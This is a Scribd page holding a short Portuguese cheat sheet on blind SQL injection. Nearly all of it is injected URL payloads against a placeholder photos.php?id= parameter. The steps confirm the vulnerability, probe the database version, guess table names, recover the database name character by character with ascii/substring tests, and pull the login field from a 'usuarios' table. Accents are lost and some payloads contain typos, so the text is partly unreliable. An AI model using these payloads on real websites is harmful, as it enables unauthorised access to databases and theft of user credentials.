Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Dicablind SQL

    Enviado por

    Ffa Appbcg
    2 visualizações2 páginas

    Título original

    dicaBlind SQL

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    DOCX, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOCX, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    2 visualizações2 páginas

    Dicablind SQL

    Enviado por

    Ffa Appbcg

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOCX, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 2

    Blind SQL - VERIFICAR SE O SITE EST VULNERVEL: http://www.xxxxxxxx.xx/photos.php?id=1 AND 1=1 ( no d erro) http://www.xxxxxxxx.xx/photos.php?

    id=1 AND 1=0 ( d erro) - VERIFICAR VERSO DO BANCO DE DADOS: http://www.xxxxxxxx.xx/photos.php?id=1 AND substring(@@version)=4 obs.: se no ocorrer erro porque a verso 4.0 / com erro ser outra verso ; - VERIFICAR O NOME DA TABELA DO BANCO DE DADOS: MTODO 1. http://www.xxxxxxxx.xx/photos.php?id=1 AND (select count(*) from usuarios); OU http://www.xxxxxxxx.xx/photos.php?id=1 AND (Select from usuarios)=1 obs.: se no der erro ento o nome do banco de dados da tabela usurio; se der erro, tente chutar outro nome : contas ; cadastro etc.

    - VERIFICAR O NOME DA TABELA DO BANCO DE DADOS: MTODO 2. 1 passo: descobrir a quantidade de caracteres do nome da tabela do banco de dados: http://www.xxxxxxxx.xx/photos.php?id=1 AND Length((database())) < 10 obs.: se no der erro , ento , o nome da tabela do banco de dados ter uma quandidade de caracteres menor que 10; http://www.xxxxxxxx.xx/photos.php?id=1 AND Length((database())) =7 obs.: se no der erro a quantidade de caractere exata do nome do banco de dados 7 2 passo: usar a tabela ascii para descobrir quais so as letras que formam o nome da tabela do banco de dados. http://www.xxxxxxxx.xx/photos.php?id=1 AND ascii(substring((database()),1,1)) <120 obs.: a primeira letra do nome do banco de dados a ser mostrada na tabela ascii est no cdigo maior que 119 http://www.xxxxxxxx.xx/photos.php?id=1 AND ascii(substring((database()),1,1)) = 117 obs.: se no haver erro porque a primeira letra do nome do banco de dados da tabela sera mostrada com o cdigo da tabela ascii correspondente a 55 que no caso 117=(u); http://www.xxxxxxxx.xx/photos.php?id=1 AND ascii(substring((database()),2,1)) = 83 obs.: se no haver erro porque a primeira letra do nome do banco de dados da tabela sera mostrada com o cdigo da tabela ascii correspondente a 55 que no caso 83=(s); repetimos o procedimento at formar a palavra com o nome mo banco de dados. - VERIFICAR O NOME DOS CAPOS DE UM BANCO DE DADOS: METODO - 1 http://www.xxxxxxxx.xx/photos.php?id=1 AND (select count(login) from usuarios); obs.: se no houver erro existe o campo login dentro da tabela usurio

    http://www.xxxxxxxx.xx/photos.php?id=1 AND (select count(login) from usuarios); obs.: se nao houver erros existe o campologin dentro da tabela usuarios;

    PODEMOS TAMBM TENTAR http://www.xxxxxxxx.xx/photos.php?id=1 AND ascii(substring((select concat(login) from usuarios limit 0,1)1,1))>0 obs.: se no houver erro existe o campo senha dentro da tabela usuario,onde na tabela ascii a primeira letra do campo usurio corresponde a um caractere com o cdigo decimal que > que 0.

    Você também pode gostar